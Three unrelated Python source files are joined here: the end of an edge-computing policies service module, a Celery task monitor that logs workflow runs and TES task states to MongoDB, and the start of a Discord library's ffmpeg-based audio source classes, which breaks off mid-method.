        try:
            # for item in CPARAMS.TOPOLOGY_FLAG:
            return [
                {'deviceID': item[0], 'deviceIP': item[1]}
                for item in lightdiscovery.get_topology()
            ]
        # BUG FIX: was a bare `except:`, which also swallows
        # SystemExit/KeyboardInterrupt.
        except Exception:
            LOG.exception('Topology Environment variable format is not correct.')
            return []
    if key == 'disc_leaderIP':
        value = lightdiscovery.leaderIP
        return default if value is None else value
    return default
def initialization():
    """Create the module-level submodules (Area Resilience, Agent Start,
    Light Discovery) in order.

    Must be called before `main()`; the created objects are stored in
    globals consumed by the REST resources above.
    """
    global arearesilience, agentstart, lightdiscovery
    # 0. Waitting time
    LOG.info('INIT: Wait {:.2f}s to start'.format(CPARAMS.TIME_WAIT_INIT))
    sleep(CPARAMS.TIME_WAIT_INIT)
    LOG.debug('INIT: Wake Me up Before You Go-Go ♫')
    # 1. Area Resilience Module Creation
    LOG.debug('Area Resilience submodule creation')
    arearesilience = AreaResilience(cimi, policiesdistribution.LPP)
    LOG.debug('Area Resilience created')
    # 2. Leader Reelection Module Creation (None)
    # 3. Agent Start Module Creation
    LOG.debug('Agent Start submodule creation')
    if CPARAMS.MF2C_FLAG:
        # Full mF2C deployment: wire the companion service addresses.
        agentstart = AgentStart(addr_pol=('127.0.0.1', '46050'),
                                addr_dis=('discovery', '46040'),
                                addr_cat=('resource-categorization', '46070'),
                                addr_id=('identification', '46060'))
    else:
        # Standalone deployment: only the policies address is needed;
        # identity comes from the environment flags instead.
        agentstart = AgentStart(addr_pol=('127.0.0.1', '46050'))
        agentstart.deviceID = CPARAMS.DEVICEID_FLAG
        if CPARAMS.LEADER_IP_FLAG is not None and len(CPARAMS.LEADER_IP_FLAG) != 0:
            agentstart.leaderIP = CPARAMS.LEADER_IP_FLAG
    LOG.debug('Agent Start created')
    # 4. Light Discovery Module Creation
    LOG.debug('Light Discovery submodule creation')
    lightdiscovery = LightDiscovery(CPARAMS.BROADCAST_ADDR_FLAG, CPARAMS.DEVICEID_FLAG)
    LOG.debug('Light discovery created')
    return
def main():
    """Run the (blocking) policies REST webservice."""
    # BUG FIX: the advertised docs URL hard-coded port 46050 while the
    # server actually binds CPARAMS.POLICIES_PORT; keep them in sync.
    LOG.info('API documentation page at: http://{}:{}/'.format('localhost', CPARAMS.POLICIES_PORT))
    app.run(debug=False, host='0.0.0.0', port=CPARAMS.POLICIES_PORT)
def debug():
    """One-shot bootstrap thread: start LDiscovery (beacon for a Leader,
    scan for an Agent) and Area Resilience via the local REST API."""
    sleep(10)  # Give some time to the webservice
    local = ('127.0.0.1', CPARAMS.POLICIES_PORT)
    LOG.info('Starting LDiscovery...')
    if CPARAMS.LEADER_FLAG:
        url = URLS.build_url_address('{}beacon/start'.format(URLS.URL_LDISCOVERY_CONTROL), portaddr=local)
    else:
        url = URLS.build_url_address('{}scan/start'.format(URLS.URL_LDISCOVERY_CONTROL), portaddr=local)
    r = requests.get(url)
    LOG.info('LDiscovery started with status_code = {}'.format(r.status_code))
    LOG.info('Starting Area Resilience...')
    r = requests.get(URLS.build_url_address(URLS.URL_POLICIES, portaddr=local))
    LOG.debug('Area Resilience request result: {}'.format(r.json()))
    LOG.debug('Stopping thread activity.')
    return
if __name__ == '__main__':
    # Build submodules first, optionally kick off the one-shot debug
    # bootstrap on a daemon thread, then serve the REST API (blocking).
    initialization()
    if CPARAMS.DEBUG_FLAG or CPARAMS.MF2C_FLAG:
        t = Thread(target=debug, name='debug_init', daemon=True)
        t.start()
    main()
    exit(0)
|
celery_task_monitor.py | """Celery task monitor, event handlers and related utility functions."""
from ast import literal_eval
from datetime import datetime
import logging
import os
import re
import requests
from shlex import quote
from threading import Thread
from time import sleep
from typing import (Dict, List, Optional)
from celery import Celery
from celery.events import Event
from celery.events.receiver import EventReceiver
from kombu.connection import Connection # noqa: F401
from pymongo import collection as Collection
import tes
import cwl_wes.database.db_utils as db_utils
# Get logger instance
logger = logging.getLogger(__name__)
# Set string time format
strf: str = '%Y-%m-%d %H:%M:%S.%f'
class TaskMonitor():
    """Celery task monitor.

    Listens for Celery task events on a background daemon thread and
    mirrors task state transitions (including TES task updates) into
    the corresponding MongoDB run document.
    """

    def __init__(
        self,
        celery_app: Celery,
        collection: Collection,
        tes_config: Dict[str, str],
        timeout: float = 0,
        authorization: bool = True,
    ) -> None:
        """Starts Celery task monitor daemon process.

        Args:
            celery_app: Celery application whose events are captured.
            collection: MongoDB collection holding the run documents.
            tes_config: TES connection settings; expects the keys
                'url', 'timeout' and 'query_params'.
            timeout: Seconds to sleep before reconnecting after the
                event listener dies.
            authorization: Whether secrets are present in the workflow
                command list and must be redacted before storage.
        """
        self.celery_app = celery_app
        self.collection = collection
        self.timeout = timeout
        self.authorization = authorization
        self.tes_config = tes_config

        # Daemon thread so the monitor never blocks interpreter shutdown
        self.thread = Thread(target=self.run, args=())
        self.thread.daemon = True
        self.thread.start()
        logger.debug('Celery task monitor daemon process started...')

    def run(self) -> None:
        """Daemon process for Celery task monitor.

        Reconnects and resumes capturing events after any non-fatal
        error, sleeping ``self.timeout`` seconds between attempts.
        """
        while True:
            try:
                with self.celery_app.connection() as \
                        connection:  # type: Connection
                    listener: EventReceiver = self.celery_app.events.Receiver(
                        connection,
                        handlers={
                            'task-received':
                                self.on_task_received,
                            'task-started':
                                self.on_task_started,
                            'task-failed':
                                self.on_task_failed,
                            'task-succeeded':
                                self.on_task_succeeded,
                            'task-tes-task-update':
                                self.on_task_tes_task_update,
                        }
                    )
                    listener.capture(limit=None, timeout=None, wakeup=True)

            except KeyboardInterrupt as e:
                logger.exception(
                    (
                        'Task monitor interrupted. Execution aborted. '
                        'Original error message: {type}: {msg}'
                    ).format(
                        type=type(e).__name__,
                        msg=e,
                    )
                )
                raise SystemExit

            except Exception as e:
                # Survive transient broker failures; retry after sleeping.
                logger.exception(
                    (
                        'Unknown error in task monitor occurred. Original '
                        'error message: {type}: {msg}'
                    ).format(
                        type=type(e).__name__,
                        msg=e,
                    )
                )

            # Sleep for specified interval before reconnecting
            sleep(self.timeout)

    def _log_db_error(self, event: Event, error: Exception) -> None:
        """Log a database update failure for the task in ``event``.

        Must be called from inside an ``except`` block so that
        ``logger.exception`` can attach the active traceback.
        """
        logger.exception(
            (
                'Database error. Could not update log information for '
                "task '{task}'. Original error message: {type}: {msg}"
            ).format(
                task=event['uuid'],
                type=type(error).__name__,
                msg=error,
            )
        )

    def on_task_received(
        self,
        event: Event,
    ) -> None:
        """Event handler for received Celery tasks."""
        if not event['name'] == 'tasks.run_workflow':
            return None

        # Parse subprocess inputs
        try:
            kwargs = literal_eval(event['kwargs'])
        except Exception as e:
            logger.exception(
                (
                    "Field 'kwargs' in event message malformed. Original "
                    'error message: {type}: {msg}'
                ).format(
                    type=type(e).__name__,
                    msg=e,
                )
            )
            # BUG FIX: previously fell through with `kwargs` unbound,
            # raising NameError below; abort handling instead.
            return None

        # Build command
        if 'command_list' in kwargs:
            if self.authorization:
                # Redact token arguments before persisting the command
                kwargs['command_list'][3] = '<REDACTED>'
                kwargs['command_list'][5] = '<REDACTED>'
            command = ' '.join(
                [quote(item) for item in kwargs['command_list']]
            )
        else:
            command = 'N/A'

        # Create dictionary for internal parameters
        internal = dict()
        internal['task_received'] = datetime.utcfromtimestamp(
            event['timestamp']
        )
        internal['process_id_worker'] = event['pid']
        internal['host'] = event['hostname']

        # Update run document in database
        try:
            self.update_run_document(
                event=event,
                state='QUEUED',
                internal=internal,
                task_received=datetime.utcfromtimestamp(
                    event['timestamp']
                ).strftime(strf),
                command=command,
                utc_offset=event['utcoffset'],
                max_retries=event['retries'],
                expires=event['expires'],
            )
        except Exception as e:
            self._log_db_error(event, e)

    def on_task_started(
        self,
        event: Event,
    ) -> None:
        """Event handler for started Celery tasks."""
        # Ignore events for tasks we are not tracking
        if not self.collection.find_one({'task_id': event['uuid']}):
            return None
        internal = dict()
        internal['task_started'] = datetime.utcfromtimestamp(
            event['timestamp']
        )

        # Update run document in database
        try:
            self.update_run_document(
                event=event,
                state='RUNNING',
                internal=internal,
                task_started=datetime.utcfromtimestamp(
                    event['timestamp']
                ).strftime(strf),
            )
        except Exception as e:
            self._log_db_error(event, e)

    def on_task_failed(
        self,
        event: Event,
    ) -> None:
        """Event handler for failed (system error) Celery tasks."""
        if not self.collection.find_one({'task_id': event['uuid']}):
            return None

        # Create dictionary for internal parameters
        internal = dict()
        internal['task_finished'] = datetime.utcfromtimestamp(
            event['timestamp']
        )
        internal['traceback'] = event['traceback']

        # Update run document in database
        self.update_run_document(
            event=event,
            state='SYSTEM_ERROR',
            internal=internal,
            task_finished=datetime.utcfromtimestamp(
                event['timestamp']
            ).strftime(strf),
            exception=event['exception'],
        )

    def on_task_succeeded(
        self,
        event: Event,
    ) -> None:
        """Event handler for successful, failed and canceled Celery
        tasks."""
        if not self.collection.find_one({'task_id': event['uuid']}):
            return None

        # Parse subprocess results
        try:
            (returncode, log, tes_ids, token) = literal_eval(event['result'])
            log_list = log
            log = os.linesep.join(log)
        except Exception as e:
            logger.exception(
                (
                    "Field 'result' in event message malformed. Original "
                    'error message: {type}: {msg}'
                ).format(
                    type=type(e).__name__,
                    msg=e,
                )
            )
            # BUG FIX: previously fell through with `returncode` & co.
            # unbound, raising NameError below; abort handling instead.
            return None

        # Create dictionary for internal parameters
        internal = dict()
        internal['task_finished'] = datetime.utcfromtimestamp(
            event['timestamp']
        )

        # Set final state to be set
        document = self.collection.find_one(
            filter={'task_id': event['uuid']},
            projection={
                'api.state': True,
                '_id': False,
            }
        )
        if document and document['api']['state'] == 'CANCELING':
            state = 'CANCELED'
        elif returncode:
            state = 'EXECUTOR_ERROR'
        else:
            state = 'COMPLETE'

        # Extract run outputs
        # outputs = self.__cwl_tes_outputs_parser(log)
        outputs = self.__cwl_tes_outputs_parser_list(log_list)

        # Get task logs
        task_logs = self.__get_tes_task_logs(
            tes_ids=tes_ids,
            token=token,
        )

        # Update run document in database
        try:
            self.update_run_document(
                event=event,
                state=state,
                internal=internal,
                outputs=outputs,
                task_logs=task_logs,
                task_finished=datetime.utcfromtimestamp(
                    event['timestamp']
                ).strftime(strf),
                return_code=returncode,
                stdout=log,
                stderr='',
            )
        except Exception as e:
            self._log_db_error(event, e)

    def on_task_tes_task_update(
        self,
        event: Event,
    ) -> None:
        """Event handler for TES task state changes."""
        # If TES task is new, add task log to database
        if not event['tes_state']:
            tes_log = self.__get_tes_task_log(
                tes_id=event['tes_id'],
                token=event['token'],
            )
            try:
                db_utils.append_to_tes_task_logs(
                    collection=self.collection,
                    task_id=event['uuid'],
                    tes_log=tes_log,
                )
            except Exception as e:
                self._log_db_error(event, e)

        # Otherwise only update state
        else:
            try:
                db_utils.update_tes_task_state(
                    collection=self.collection,
                    task_id=event['uuid'],
                    tes_id=event['tes_id'],
                    state=event['tes_state'],
                )
                logger.info(
                    (
                        "State of TES task '{tes_id}' of run with task ID "
                        "'{task_id}' changed to '{state}'."
                    ).format(
                        task_id=event['uuid'],
                        tes_id=event['tes_id'],
                        state=event['tes_state'],
                    )
                )
            except Exception as e:
                self._log_db_error(event, e)

    def update_run_document(
        self,
        event: Event,
        state: Optional[str] = None,
        internal: Optional[Dict] = None,
        outputs: Optional[Dict] = None,
        task_logs: Optional[List[Dict]] = None,
        **run_log_params
    ):
        """Updates state, internal and run log parameters in database
        document.

        Args:
            event: Celery event carrying the task UUID in 'uuid'.
            state: New run state, if it changed.
            internal: Fields to upsert under the 'internal' object.
            outputs: Fields to upsert under 'api.outputs'.
            task_logs: TES task logs to store under 'api'.
            **run_log_params: Fields to upsert under 'api.run_log'.

        Returns:
            The last updated run document, or ``None`` when nothing
            was written.
        """
        # TODO: Minimize db ops; try to compile entire object & update once
        # BUG FIX: `document` was unbound (NameError) when no section
        # below was updated.
        document = None

        # Update internal parameters
        if internal:
            document = db_utils.upsert_fields_in_root_object(
                collection=self.collection,
                task_id=event['uuid'],
                root='internal',
                **internal,
            )

        # Update outputs
        if outputs:
            document = db_utils.upsert_fields_in_root_object(
                collection=self.collection,
                task_id=event['uuid'],
                root='api.outputs',
                **outputs,
            )

        # Update task logs
        if task_logs:
            document = db_utils.upsert_fields_in_root_object(
                collection=self.collection,
                task_id=event['uuid'],
                root='api',
                task_logs=task_logs,
            )

        # Update run log parameters
        if run_log_params:
            document = db_utils.upsert_fields_in_root_object(
                collection=self.collection,
                task_id=event['uuid'],
                root='api.run_log',
                **run_log_params,
            )

        # Calculate queue, execution and run time
        if document and document['internal']:
            run_log = document['internal']
            durations = dict()

            # BUG FIX: the duration arithmetic previously ran *outside*
            # the key-existence guards (the guards only contained
            # `pass`), raising KeyError whenever a timestamp was missing.
            if 'task_started' in run_log_params:
                if 'task_started' in run_log and 'task_received' in run_log:
                    durations['time_queue'] = (
                        run_log['task_started'] - run_log['task_received']
                    ).total_seconds()

            if 'task_finished' in run_log_params:
                if 'task_finished' in run_log and 'task_started' in run_log:
                    durations['time_execution'] = (
                        run_log['task_finished'] - run_log['task_started']
                    ).total_seconds()
                if 'task_finished' in run_log and 'task_received' in run_log:
                    durations['time_total'] = (
                        run_log['task_finished'] - run_log['task_received']
                    ).total_seconds()

            if durations:
                document = db_utils.upsert_fields_in_root_object(
                    collection=self.collection,
                    task_id=event['uuid'],
                    root='api.run_log',
                    **durations,
                )

        # Update state (previous no-op `try/except: raise` removed)
        if state:
            document = db_utils.update_run_state(
                collection=self.collection,
                task_id=event['uuid'],
                state=state,
            )

        # Log info message
        if document:
            logger.info(
                (
                    "State of run '{run_id}' (task id: '{task_id}') changed "
                    "to '{state}'."
                ).format(
                    run_id=document['run_id'],
                    task_id=event['uuid'],
                    state=state,
                )
            )

        return document

    @staticmethod
    def __cwl_tes_outputs_parser(log: str) -> Dict:
        """Parses outputs from cwl-tes log."""
        # Find outputs object in log string
        re_outputs = re.compile(
            r'(^\{$\n^ {4}"\S+": [\[\{]$\n(^ {4,}.*$\n)*^ {4}[\]\}]$\n^\}$\n)',
            re.MULTILINE
        )
        m = re_outputs.search(log)
        if m:
            return literal_eval(m.group(1))
        else:
            return dict()

    @staticmethod
    def __cwl_tes_outputs_parser_list(log: List) -> Dict:
        """Parses outputs from the cwl-tes log lines.

        The outputs JSON ends on the line before last in the logs, so
        unless the outputs are empty ('{}') this scans upward to find
        the start of the JSON object and evaluates it.
        """
        # NOTE: the original placed the explanation in several adjacent
        # string literals; only the first was a real docstring.
        indices = range(len(log) - 1, -1, -1)
        start = -1
        end = -1
        for index in indices:
            if log[index].rstrip() == '{}':
                return dict()
            elif log[index].rstrip() == '}':
                end = index
                break
        # No valid JSON was found and the previous loop
        # reached the end of the log
        if end == 0:
            return dict()
        indices = range(end - 1, -1, -1)
        for index in indices:
            if log[index].rstrip() == '{':
                start = index
                break
        json_str = os.linesep.join(log[start:end + 1])
        try:
            return literal_eval(json_str)
        except ValueError as verr:
            logger.exception(
                "ValueError when evaluation JSON: '%s'. Original error message: %s" %
                (json_str, verr)
            )
            return dict()
        except SyntaxError as serr:
            logger.exception(
                "SyntaxError when evaluation JSON: '%s'. Original error message: %s" %
                (json_str, serr)
            )
            return dict()

    def __get_tes_task_logs(
        self,
        tes_ids: Optional[List] = None,
        token: Optional[str] = None,
    ) -> List[Dict]:
        """Gets multiple task logs from TES instance.

        BUG FIX: the default was the mutable `list()`, evaluated once
        at definition time; `None` is used as the sentinel instead.
        """
        return [
            self.__get_tes_task_log(tes_id=tes_id, token=token)
            for tes_id in (tes_ids or [])
        ]

    def __get_tes_task_log(
        self,
        tes_id: str,
        token: Optional[str] = None,
    ) -> Dict:
        """Gets task log from TES instance; empty dict on failure."""
        tes_client = tes.HTTPClient(
            url=self.tes_config['url'],
            timeout=self.tes_config['timeout'],
            token=token,
        )
        task_log = {}
        try:
            task_log = tes_client.get_task(
                task_id=tes_id,
                view=self.tes_config['query_params'],
            ).as_dict()
        except Exception as e:
            # TODO: handle more robustly: only 400/Bad Request is okay;
            # TODO: other errors (e.g. 500) should be dealt with
            logger.warning(
                "Could not obtain task log. Setting default. Original error "
                f"message: {type(e).__name__}: {e}"
            )
            task_log = {}
        logger.debug(f'Task log: {task_log}')
        return task_log
|
player.py | """
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import annotations
import threading
import traceback
import subprocess
import audioop
import asyncio
import logging
import shlex
import time
import json
import sys
import re
import io
from typing import (
Any,
Awaitable,
Callable,
Generic,
IO,
Optional,
TYPE_CHECKING,
Tuple,
Type,
TypeVar,
Union,
)
from .errors import ClientException
from .opus import Encoder as OpusEncoder
from .oggparse import OggStream
from .utils import MISSING
if TYPE_CHECKING:
from .voice_client import VoiceClient
AT = TypeVar('AT', bound='AudioSource')
FT = TypeVar('FT', bound='FFmpegOpusAudio')
_log = logging.getLogger(__name__)
__all__ = (
'AudioSource',
'PCMAudio',
'FFmpegAudio',
'FFmpegPCMAudio',
'FFmpegOpusAudio',
'PCMVolumeTransformer',
)
# Windows-only Popen creation flag: prevents the spawned ffmpeg process
# from opening a console window. Must be 0 (no-op) on other platforms.
CREATE_NO_WINDOW: int

if sys.platform != 'win32':
    CREATE_NO_WINDOW = 0
else:
    CREATE_NO_WINDOW = 0x08000000
class AudioSource:
    """Base class for audio streams.

    A source may yield Opus-encoded audio or raw PCM; when it is not
    Opus encoded, the format must be 16-bit 48KHz stereo PCM.

    .. warning::

        The audio source reads are done in a separate thread.
    """

    def read(self) -> bytes:
        """Read and return the next 20ms of audio.

        Subclasses must override this. Returning an empty
        :term:`py:bytes-like object` signals the end of the stream.
        When :meth:`~AudioSource.is_opus` returns ``True`` the data must
        be 20ms of Opus-encoded audio; otherwise 20ms of 16-bit 48KHz
        stereo PCM (about 3,840 bytes per frame).

        Returns
        --------
        :class:`bytes`
            A bytes like object that represents the PCM or Opus data.
        """
        raise NotImplementedError

    def is_opus(self) -> bool:
        """Whether this source already produces Opus-encoded audio."""
        return False

    def cleanup(self) -> None:
        """Release any resources held by the source.

        Called once playback is finished; useful for clearing buffers
        or terminating helper processes.
        """
        pass

    def __del__(self) -> None:
        # Best-effort cleanup when the source is garbage collected.
        self.cleanup()
class PCMAudio(AudioSource):
    """Represents raw 16-bit 48KHz stereo PCM audio source.

    Attributes
    -----------
    stream: :term:`py:file object`
        A file-like object that reads byte data representing raw PCM.
    """

    def __init__(self, stream: io.BufferedIOBase) -> None:
        self.stream: io.BufferedIOBase = stream

    def read(self) -> bytes:
        frame = self.stream.read(OpusEncoder.FRAME_SIZE)
        # A short read signals the end of the stream.
        return frame if len(frame) == OpusEncoder.FRAME_SIZE else b''
class FFmpegAudio(AudioSource):
    """Represents an FFmpeg (or AVConv) based AudioSource.

    User created AudioSources using FFmpeg differently from how
    :class:`FFmpegPCMAudio` and :class:`FFmpegOpusAudio` work should
    subclass this.

    .. versionadded:: 1.3
    """

    def __init__(self, source: Union[str, io.BufferedIOBase], *, executable: str = 'ffmpeg', args: Any, **subprocess_kwargs: Any):
        piping = subprocess_kwargs.get('stdin') == subprocess.PIPE
        if piping and isinstance(source, str):
            raise TypeError("parameter conflict: 'source' parameter cannot be a string when piping to stdin")

        args = [executable, *args]
        kwargs = {'stdout': subprocess.PIPE}
        kwargs.update(subprocess_kwargs)

        self._process: subprocess.Popen = self._spawn_process(args, **kwargs)
        self._stdout: IO[bytes] = self._process.stdout  # type: ignore
        # BUG FIX: the annotation previously referenced the undefined
        # name `Bytes`; the builtin `bytes` is intended.
        self._stdin: Optional[IO[bytes]] = None
        self._pipe_thread: Optional[threading.Thread] = None

        if piping:
            # Feed `source` into ffmpeg's stdin from a daemon thread.
            n = f'popen-stdin-writer:{id(self):#x}'
            self._stdin = self._process.stdin
            self._pipe_thread = threading.Thread(target=self._pipe_writer, args=(source,), daemon=True, name=n)
            self._pipe_thread.start()

    def _spawn_process(self, args: Any, **subprocess_kwargs: Any) -> subprocess.Popen:
        """Launch the ffmpeg subprocess, translating failures into
        :exc:`ClientException`."""
        process = None
        try:
            process = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, **subprocess_kwargs)
        except FileNotFoundError:
            # Report only the executable name, not the full command line.
            executable = args.partition(' ')[0] if isinstance(args, str) else args[0]
            raise ClientException(executable + ' was not found.') from None
        except subprocess.SubprocessError as exc:
            raise ClientException(f'Popen failed: {exc.__class__.__name__}: {exc}') from exc
        else:
            return process

    def _kill_process(self) -> None:
        """Terminate the ffmpeg subprocess, waiting for it to exit."""
        proc = self._process
        if proc is MISSING:
            # cleanup() already ran.
            return

        _log.info('Preparing to terminate ffmpeg process %s.', proc.pid)

        try:
            proc.kill()
        except Exception:
            _log.exception('Ignoring error attempting to kill ffmpeg process %s', proc.pid)

        if proc.poll() is None:
            _log.info('ffmpeg process %s has not terminated. Waiting to terminate...', proc.pid)
            proc.communicate()
            _log.info('ffmpeg process %s should have terminated with a return code of %s.', proc.pid, proc.returncode)
        else:
            _log.info('ffmpeg process %s successfully terminated with return code of %s.', proc.pid, proc.returncode)

    def _pipe_writer(self, source: io.BufferedIOBase) -> None:
        """Daemon-thread loop copying `source` into the process stdin."""
        while self._process:
            # arbitrarily large read size
            data = source.read(8192)
            if not data:
                self._process.terminate()
                return
            try:
                self._stdin.write(data)
            except Exception:
                _log.debug('Write error for %s, this is probably not a problem', self, exc_info=True)
                # at this point the source data is either exhausted or
                # the process is fubar
                self._process.terminate()
                return

    def cleanup(self) -> None:
        self._kill_process()
        # Mark handles as gone so repeated cleanup is a no-op.
        self._process = self._stdout = self._stdin = MISSING
class FFmpegPCMAudio(FFmpegAudio):
    """An FFmpeg (or AVConv) backed audio source producing PCM.

    Launches an ffmpeg subprocess that converts ``source`` into 16-bit
    48KHz stereo PCM, read from the process' stdout.

    .. warning::

        You must have the ffmpeg or avconv executable in your path
        environment variable in order for this to work.

    Parameters
    ------------
    source: Union[:class:`str`, :class:`io.BufferedIOBase`]
        The input that ffmpeg will take and convert to PCM bytes.
        If ``pipe`` is ``True`` then this is a file-like object that is
        passed to the stdin of ffmpeg.
    executable: :class:`str`
        The executable name (and path) to use. Defaults to ``ffmpeg``.
    pipe: :class:`bool`
        If ``True``, denotes that ``source`` parameter will be passed
        to the stdin of ffmpeg. Defaults to ``False``.
    stderr: Optional[:term:`py:file object`]
        A file-like object to pass to the Popen constructor.
        Could also be an instance of ``subprocess.PIPE``.
    before_options: Optional[:class:`str`]
        Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
    options: Optional[:class:`str`]
        Extra command line arguments to pass to ffmpeg after the ``-i`` flag.

    Raises
    --------
    ClientException
        The subprocess failed to be created.
    """

    def __init__(
        self,
        source: Union[str, io.BufferedIOBase],
        *,
        executable: str = 'ffmpeg',
        pipe: bool = False,
        stderr: Optional[IO[str]] = None,
        before_options: Optional[str] = None,
        options: Optional[str] = None
    ) -> None:
        # Assemble the ffmpeg argument vector around the `-i` input flag.
        args = []
        if isinstance(before_options, str):
            args.extend(shlex.split(before_options))
        args.append('-i')
        args.append('-' if pipe else source)
        # Force raw signed 16-bit LE, 48KHz, stereo output on stdout.
        args.extend(('-f', 's16le', '-ar', '48000', '-ac', '2', '-loglevel', 'warning'))
        if isinstance(options, str):
            args.extend(shlex.split(options))
        args.append('pipe:1')

        subprocess_kwargs = {
            'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL,
            'stderr': stderr,
        }
        super().__init__(source, executable=executable, args=args, **subprocess_kwargs)

    def read(self) -> bytes:
        frame = self._stdout.read(OpusEncoder.FRAME_SIZE)
        # A partial frame means the stream ended; signal it with b''.
        if len(frame) != OpusEncoder.FRAME_SIZE:
            return b''
        return frame

    def is_opus(self) -> bool:
        # Output is raw PCM; the library must Opus-encode it.
        return False
class FFmpegOpusAudio(FFmpegAudio):
    """An audio source from FFmpeg (or AVConv).

    This launches a sub-process to a specific input file given. However, rather than
    producing PCM packets like :class:`FFmpegPCMAudio` does that need to be encoded to
    Opus, this class produces Opus packets, skipping the encoding step done by the library.

    Alternatively, instead of instantiating this class directly, you can use
    :meth:`FFmpegOpusAudio.from_probe` to probe for bitrate and codec information. This
    can be used to opportunistically skip pointless re-encoding of existing Opus audio data
    for a boost in performance at the cost of a short initial delay to gather the information.
    The same can be achieved by passing ``copy`` to the ``codec`` parameter, but only if you
    know that the input source is Opus encoded beforehand.

    .. versionadded:: 1.3

    .. warning::
        You must have the ffmpeg or avconv executable in your path environment
        variable in order for this to work.

    Parameters
    ------------
    source: Union[:class:`str`, :class:`io.BufferedIOBase`]
        The input that ffmpeg will take and convert to Opus bytes.
        If ``pipe`` is ``True`` then this is a file-like object that is
        passed to the stdin of ffmpeg.
    bitrate: :class:`int`
        The bitrate in kbps to encode the output to. Defaults to ``128``.
    codec: Optional[:class:`str`]
        The codec to use to encode the audio data. Normally this would be
        just ``libopus``, but is used by :meth:`FFmpegOpusAudio.from_probe` to
        opportunistically skip pointlessly re-encoding Opus audio data by passing
        ``copy`` as the codec value. Any values other than ``copy``, ``opus``, or
        ``libopus`` will be considered ``libopus``. Defaults to ``libopus``.

        .. warning::
            Do not provide this parameter unless you are certain that the audio input is
            already Opus encoded. For typical use :meth:`FFmpegOpusAudio.from_probe`
            should be used to determine the proper value for this parameter.

    executable: :class:`str`
        The executable name (and path) to use. Defaults to ``ffmpeg``.
    pipe: :class:`bool`
        If ``True``, denotes that ``source`` parameter will be passed
        to the stdin of ffmpeg. Defaults to ``False``.
    stderr: Optional[:term:`py:file object`]
        A file-like object to pass to the Popen constructor.
        Could also be an instance of ``subprocess.PIPE``.
    before_options: Optional[:class:`str`]
        Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
    options: Optional[:class:`str`]
        Extra command line arguments to pass to ffmpeg after the ``-i`` flag.

    Raises
    --------
    ClientException
        The subprocess failed to be created.
    """

    def __init__(
        self,
        source: Union[str, io.BufferedIOBase],
        *,
        bitrate: int = 128,
        codec: Optional[str] = None,
        executable: str = 'ffmpeg',
        pipe: bool = False,
        stderr: Optional[IO[str]] = None,
        before_options: Optional[str] = None,
        options: Optional[str] = None,
    ) -> None:
        args = []
        subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}
        if isinstance(before_options, str):
            args.extend(shlex.split(before_options))
        args.append('-i')
        args.append('-' if pipe else source)
        # FIX: honor an explicit 'copy' as documented above, in addition to
        # mapping probed 'opus'/'libopus' codecs to stream copy. Previously
        # 'copy' itself fell through to 'libopus', forcing a pointless
        # re-encode and contradicting the documented contract.
        codec = 'copy' if codec in ('opus', 'libopus', 'copy') else 'libopus'
        args.extend(('-map_metadata', '-1',
                     '-f', 'opus',
                     '-c:a', codec,
                     '-ar', '48000',
                     '-ac', '2',
                     '-b:a', f'{bitrate}k',
                     '-loglevel', 'warning'))
        if isinstance(options, str):
            args.extend(shlex.split(options))
        args.append('pipe:1')
        super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
        # ffmpeg emits an Ogg container; iterate its Opus packets lazily.
        self._packet_iter = OggStream(self._stdout).iter_packets()

    @classmethod
    async def from_probe(
        cls: Type[FT],
        source: str,
        *,
        method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
        **kwargs: Any,
    ) -> FT:
        """|coro|

        A factory method that creates a :class:`FFmpegOpusAudio` after probing
        the input source for audio codec and bitrate information.

        Examples
        ----------
        Use this function to create an :class:`FFmpegOpusAudio` instance instead of the constructor: ::

            source = await nextcord.FFmpegOpusAudio.from_probe("song.webm")
            voice_client.play(source)

        If you are on Windows and don't have ffprobe installed, use the ``fallback`` method
        to probe using ffmpeg instead: ::

            source = await nextcord.FFmpegOpusAudio.from_probe("song.webm", method='fallback')
            voice_client.play(source)

        Using a custom method of determining codec and bitrate: ::

            def custom_probe(source, executable):
                # some analysis code here
                return codec, bitrate

            source = await nextcord.FFmpegOpusAudio.from_probe("song.webm", method=custom_probe)
            voice_client.play(source)

        Parameters
        ------------
        source
            Identical to the ``source`` parameter for the constructor.
        method: Optional[Union[:class:`str`, Callable[:class:`str`, :class:`str`]]]
            The probing method used to determine bitrate and codec information. As a string, valid
            values are ``native`` to use ffprobe (or avprobe) and ``fallback`` to use ffmpeg
            (or avconv). As a callable, it must take two string arguments, ``source`` and
            ``executable``. Both parameters are the same values passed to this factory function.
            ``executable`` will default to ``ffmpeg`` if not provided as a keyword argument.
        kwargs
            The remaining parameters to be passed to the :class:`FFmpegOpusAudio` constructor,
            excluding ``bitrate`` and ``codec``.

        Raises
        --------
        AttributeError
            Invalid probe method, must be ``'native'`` or ``'fallback'``.
        TypeError
            Invalid value for ``probe`` parameter, must be :class:`str` or a callable.

        Returns
        --------
        :class:`FFmpegOpusAudio`
            An instance of this class.
        """
        executable = kwargs.get('executable')
        codec, bitrate = await cls.probe(source, method=method, executable=executable)
